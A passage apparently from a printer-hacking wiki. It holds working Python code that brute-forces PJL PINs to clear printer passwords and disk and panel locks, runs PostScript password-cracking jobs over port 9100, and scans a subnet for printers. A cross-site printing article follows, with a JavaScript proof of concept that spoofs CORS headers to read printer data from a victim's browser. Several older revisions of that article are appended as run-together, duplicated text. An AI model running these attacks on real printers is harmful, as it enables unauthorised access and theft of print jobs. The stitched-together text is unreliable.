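UEL = b"\x1b%-12345X"   # universal exit language, frames every job


def build_pjl_unlock_job(first=1, last=65535):
    """One job per PIN: JOB PASSWORD authenticates the job, the DEFAULT lines
    then clear the password and both locks. Only the job carrying the right
    PIN is honoured, the rest are ignored, so no feedback is needed."""
    if not 1 <= first <= last <= 65535:
        raise ValueError("PJL passwords are numeric, 1..65535")
    parts = [UEL]
    for pin in range(first, last + 1):
        parts.append(b"@PJL JOB PASSWORD=%d\r\n" % pin
                     + b"@PJL DEFAULT PASSWORD=0\r\n"
                     + b"@PJL DEFAULT DISKLOCK=OFF\r\n"
                     + b"@PJL DEFAULT CPLOCK=OFF\r\n"
                     + b"@PJL EOJ\r\n")
    parts.append(UEL)
    return b"".join(parts)


def parse_pjl_dinquire(reply):
    """'@PJL DINQUIRE var\\r\\nvalue\\r\\n\\f' -> (var, value). For PASSWORD a
    compliant device answers DISABLED/ENABLED; some echo the PIN itself."""
    text = reply.decode("ascii", "replace").replace("\f", "")
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if len(lines) < 2 or not lines[0].startswith("@PJL DINQUIRE "):
        raise ValueError("not a DINQUIRE reply: %r" % reply)
    return lines[0][len("@PJL DINQUIRE "):], lines[1]


def ps_string(s):
    """PostScript literal string with ( ) \\ and non-printables escaped."""
    out = []
    for ch in s.encode("latin-1"):
        if ch in b"()\\":
            out.append("\\" + chr(ch))
        elif 32 <= ch < 127:
            out.append(chr(ch))
        else:
            out.append("\\%03o" % ch)
    return "(" + "".join(out) + ")"


def build_ps_crack_job(candidates):
    """Dictionary attack run by the RIP itself: every candidate (int or str)
    is passed to checkpassword, the first match is echoed back as FOUND:."""
    literals = [str(c) if isinstance(c, int) else ps_string(c) for c in candidates]
    program = ("%!\nstatusdict begin\n{ [\n" + "\n".join(literals) + "\n]\n"
               "{ dup checkpassword { (FOUND:) print == flush stop } { pop } ifelse } forall\n"
               "(nomatch) = flush } stopped pop\nend\n")
    return UEL + b"\r\n" + program.encode("latin-1") + UEL


def ps_unescape(body):
    """Undo the escapes == puts into a printed string."""
    simple = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}
    out, i = [], 0
    while i < len(body):
        if body[i] != "\\":
            out.append(body[i])
            i += 1
            continue
        nxt = body[i + 1]
        if nxt in simple:
            out.append(simple[nxt])
            i += 2
        elif nxt in "01234567":          # \ooo octal escape, up to 3 digits
            j = i + 1
            while j < len(body) and j < i + 4 and body[j] in "01234567":
                j += 1
            out.append(chr(int(body[i + 1:j], 8)))
            i = j
        else:                            # \( \) \\ and friends
            out.append(nxt)
            i += 2
    return "".join(out)


def parse_ps_crack_result(output):
    """Password from the back channel: str for string candidates, int for
    integer candidates, None if the job reported nomatch."""
    for line in output.decode("latin-1").splitlines():
        if line.startswith("FOUND:"):
            token = line[len("FOUND:"):].strip()
            if token.startswith("(") and token.endswith(")"):
                return ps_unescape(token[1:-1])
            return int(token)
    return None


def send_job(host, job, port=9100, timeout=5.0):
    """Raw port 9100 round trip (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(job)
        chunks = []
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)
```

Against a live device the PJL variant is `send_job(host, build_pjl_unlock_job())` followed by `parse_pjl_dinquire(send_job(host, UEL + b"@PJL DINQUIRE PASSWORD\r\n" + UEL))`, which should now read DISABLED; the PostScript variant is `parse_ps_crack_result(send_job(host, build_ps_crack_job(wordlist)))`. The full PJL job is about 6.5 MB, which is the price of not needing a back channel.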
{| class="wikitable" style="text-align:center"
|+ Exhaustive key search in PJL and PostScript
|-
! rowspan="2" | Printer model !! colspan="2" | PJL passwords !! colspan="2" | PostScript passwords
|-
! key size !! tests/sec !! key size !! tests/sec
|-
| HP LaserJet 1200 || 16 bit || 200 || 524,280 bit || 5,000
|-
| HP LaserJet 4200N || 16 bit || 200 || 524,280 bit || 91,000
|-
| HP LaserJet 4250N || 16 bit || 130 || 524,280 bit || 100,000
|-
| HP LaserJet P2015dn || 16 bit || 1,000 || 524,280 bit || 83,000
|-
| HP LaserJet M2727nfs || 16 bit || 100 || 524,280 bit || 100,000
|-
| HP LaserJet 3392 AiO || 16 bit || 1,000 || 524,280 bit || 53,000
|-
| HP Color LJ CP1515n || 16 bit || 1,000 || 524,280 bit || 100,000
|-
| Brother MFC-9120CN || 16 bit || n/a* || 8 bit || 1
|-
| Brother DCP-9045CDN || 16 bit || n/a* || 8 bit || 1
|-
| Lexmark X264dn || n/a || n/a || 524,280 bit || 5,000
|-
| Lexmark E360dn || n/a || n/a || 524,280 bit || 8,000
|-
| Lexmark C736dn || n/a || n/a || 524,280 bit || 53,000
|-
| Dell 5130cdn || n/a** || n/a || 524,280 bit || 62,000
|-
| Dell 1720n || n/a || n/a || 524,280 bit || 12,000
|-
| Dell 3110cn || n/a** || n/a || 524,280 bit || 50,000
|-
| Kyocera FS-C5200DN || 16 bit || 50 || n/a || n/a
|-
| Samsung CLX-3305W || n/a || n/a || 524,280 bit || 62,000
|-
| Samsung MultiPress 6345N || n/a || n/a || n/a || n/a
|-
| Konica bizhub 20p || 16 bit || n/a* || 8 bit || 1
|-
| OKI MC342dn || n/a || n/a || 524,280 bit || 38,000
|}

<small>* The PIN is not verified when locking or unlocking the control panel (see above), so there is nothing to crack. ** These devices show the password in response to <code>@PJL DINQUIRE PASSWORD</code>.</small>

% Konica bizhub C454e (not included above): PJL 16 bit, 50 tests/sec; PostScript 524,280 bit, rate not measured.

-->

Cross-site printing (page revision 619, 2017-03-24T12:00:20Z, Admin)

Cross-site printing (XSP) attacks empower a web attacker to access the printer device, as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref>, who uses a hidden iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded, depending on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved, which enables a web attacker to perform most attacks described in this wiki, including obtaining captured print jobs, using the victim's web browser as a carrier.
[[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]]

== Enhanced cross-site printing ==

Instead of iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be sent to the device, not received, because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This rules out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used, provided the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control over what the requested ‘web server’, which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp, sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP response header, including an arbitrary CORS <code>Access-Control-Allow-Origin</code> field which instructs the web browser to allow JavaScript access to this resource and therefore punches a hole into the same-origin policy.
A schematic overview of the attack is given below:

[[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]]

In such an enhanced variant of XSP, combined with CORS spoofing, a web attacker has full access to the HTTP response, which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snippet is shown below:

<syntaxhighlight lang=javascript>
// PostScript job that makes the printer answer with a spoofed HTTP response
// whose body is the printer's product name
var job = "\x1B%-12345X\r\n" +
  "%!\r\n" +
  "(HTTP/1.0 200 OK\\n) print\r\n" +
  "(Server: PostScript HTTPD\\n) print\r\n" +
  "(Access-Control-Allow-Origin: *\\n) print\r\n" +
  "(Connection: close\\n) print\r\n" +
  "(Content-Length: ) print\r\n" +
  "product dup length dup string cvs print\r\n" +  // body length as decimal
  "(\\n\\n) print\r\n" +                             // end of header
  "print\r\n" +                                      // the product string itself
  "(\\n) print flush\r\n" +                          // trailing newline lies outside Content-Length
  "\x1B%-12345X\r\n";
var x = new XMLHttpRequest();
x.open("POST", "http://printer:9100");
x.onreadystatechange = function() {
  if (x.readyState == 4) alert(x.responseText);
};
x.send(job);
</syntaxhighlight>

== Limitations of cross-site printing ==

Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because it unfortunately prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results of PJL commands. Two implementation pitfalls deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be returned needs to be determined within PostScript. If the attacker cannot predict the overall size of the response and chunked encoding is not an option either, she needs to set a very high value and pad the body to that length.
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing, the HTTP request header of the XHR is printed out as hard copy, including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer (and under some circumstances can disable printing functionality) until the HTTP body is processed, by which time the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]], using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all these protocols could successfully be used to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W.
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref>, they have some drawbacks beyond not providing feedback via spoofed CORS headers:
* Cross-protocol access to LPD and FTP ports is blocked by various web browsers
* Parameters for direct printing over the embedded web server are model-specific
* The IPP standard requires the <code>Content-Type</code> of HTTP POST requests to be set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref>, which cannot be done with XHR objects without triggering a CORS preflight (OPTIONS) request that the printer does not answer; it is however up to the implementation to actually care about incorrect types

A comparison of cross-site printing channels is given below:

{| class="wikitable" style="text-align:center"
|-
! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by
|-
| Raw || 9100 || - || ✔ || ✔ || -
|-
| Web || 80 || ✔ || - || - || -
|-
| IPP || 631 || ✔ || - || ✔ || -
|-
| LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op
|-
| FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE
|-
|}

One major problem of XSP is finding out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref>, which is implemented in most modern browsers and has the feature to enumerate IP addresses of local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp of all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing, which only takes seconds in our tests. If the printer is on the same subnet as the victim's host, its address can be detected solely using JavaScript.
WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: we try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan its subnet for printers as described before.

== Proof-of-concept ==

A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it routes all connections, including those to local addresses, through the Tor network, meaning XSP requests never reach the intranet printer.
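An offline pre-flight for the discovery and CORS-spoofing steps described above, added here as an example (it is not the wiki's proof of concept, and its names are the example's own): it lists the 253 sibling addresses of a leaked local IP, builds the PostScript job that answers with a spoofed HTTP response padded to a fixed <code>Content-Length</code> (the workaround for unpredictable body sizes mentioned under the pitfalls), and verifies that a reply carries what the browser needs before the job is embedded in JavaScript; the reply parsed offline is constructed.

```python
"""Pre-flight check for XSP with CORS spoofing over raw port 9100. Example
code added to this page, not the wiki's proof of concept; the reply parsed
offline is constructed."""
import ipaddress
import socket

UEL = b"\x1b%-12345X"


def subnet_candidates(local_ip):
    """The other 253 hosts of the /24 around a (WebRTC-leaked) local address."""
    net = ipaddress.ip_network(local_ip + "/24", strict=False)
    return [str(h) for h in net.hosts() if str(h) != local_ip]


def build_cors_job(data_expr="product", fixed_length=4096):
    """PostScript that emulates an HTTP server. The body is whatever data_expr
    leaves on the stack (here the product name), truncated to fixed_length and
    padded with spaces up to it, so the announced Content-Length is always met
    even when the real size is unknown in advance. Header lines are
    LF-separated like the snippet above; browsers accept that."""
    program = "\n".join([
        "%!",
        "(HTTP/1.0 200 OK\\n) print",
        "(Server: PostScript HTTPD\\n) print",
        "(Access-Control-Allow-Origin: *\\n) print",
        "(Connection: close\\n) print",
        "(Content-Length: %d\\n\\n) print" % fixed_length,
        "/data %s def" % data_expr,
        "data length %d gt { /data data 0 %d getinterval def } if"
        % (fixed_length, fixed_length),
        "data print",
        "%d data length sub { ( ) print } repeat" % fixed_length,
        "flush", ""])
    return UEL + b"\r\n" + program.encode("ascii") + UEL


def parse_spoofed_response(raw):
    """Split an HTTP response (LF-only or CRLF) and verify what the browser
    relies on: a 200 status line, a CORS header, Connection: close and a
    body at least Content-Length long. Padding spaces are stripped."""
    head, sep, body = raw.partition(b"\n\n")
    if not sep:
        head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header never terminated")
    lines = head.decode("latin-1").splitlines()
    status = lines[0].split()
    if len(status) < 2 or not status[0].startswith("HTTP/") or status[1] != "200":
        raise ValueError("bad status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "access-control-allow-origin" not in headers:
        raise ValueError("no CORS header, responseText would be blocked")
    if headers.get("connection", "").lower() != "close":
        raise ValueError("no Connection: close, printer would stay busy")
    length = int(headers["content-length"])
    if len(body) < length:
        raise ValueError("short body: %d of %d bytes" % (len(body), length))
    return {"status": 200, "cors": headers["access-control-allow-origin"],
            "body": body[:length].rstrip(b" ").decode("latin-1")}


def is_acceptable(raw):
    """True if a browser would hand raw to the attacker's JavaScript."""
    try:
        parse_spoofed_response(raw)
        return True
    except (ValueError, KeyError, IndexError):
        return False


def probe_printer(host, port=9100, timeout=3.0):
    """Live use (not run offline): send the job to one host and parse the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_cors_job())
        chunks = []
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return parse_spoofed_response(b"".join(chunks))


# Constructed reply: what a printer running build_cors_job(fixed_length=32)
# returns for a 16 character product name.
SAMPLE_REPLY = (b"HTTP/1.0 200 OK\nServer: PostScript HTTPD\n"
                b"Access-Control-Allow-Origin: *\nConnection: close\n"
                b"Content-Length: 32\n\n" + b"HP LaserJet 4250" + b" " * 16)
```

Looping `probe_printer()` over `subnet_candidates(leaked_ip)` reproduces the JavaScript scan from the attacker's machine, which is useful to confirm a given model actually returns the spoofed header before relying on a victim's browser to do it. The padding costs bandwidth but never leaves the browser waiting for bytes that never arrive, which is the failure mode when the announced length is guessed too high.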
<span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Spoofing]'', Bugzilla@Mozilla</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 5f4b77da17a77585ef66a1bc5363b08c4c0e6ca6 618 617 2017-03-24T11:11:21Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. 
A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. 
A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. 
If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. 
Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |- ! Channel !! Port !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || 9100 || - || ✔ || ✔ || - |- | Web || 80 || ✔ || - || - || - |- | IPP || 631 || ✔ || - || ✔ || - |- | LPD || 515 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op |- | FTP || 21 || ✔ || - || ✔ | style="text-align:left;" | FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. 
== Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. <span style="color:red">Update: To prevent cross-site printing, port 9100/tcp may be blocked in future releases of Firefox <ref>''[https://bugzilla.mozilla.org/show_bug.cgi?id=1335688 Bug 1335688 - Cross-Site Printing (XSP) and CORS Spoofing]'', Bugzilla@Mozilla, 2017</ref> and Chrome <ref>''[https://bugs.chromium.org/p/chromium/issues/detail?id=687530 Issue 687530 - Security: Cross-Site Printing (XSP) and CORS Spoofing]'', Chromium Bug Tracker, 2017</ref>.</span> → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 5c4f680eafba7e5d06be408c52871d8c4fbd7095 617 616 2017-03-24T11:08:49Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a hole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
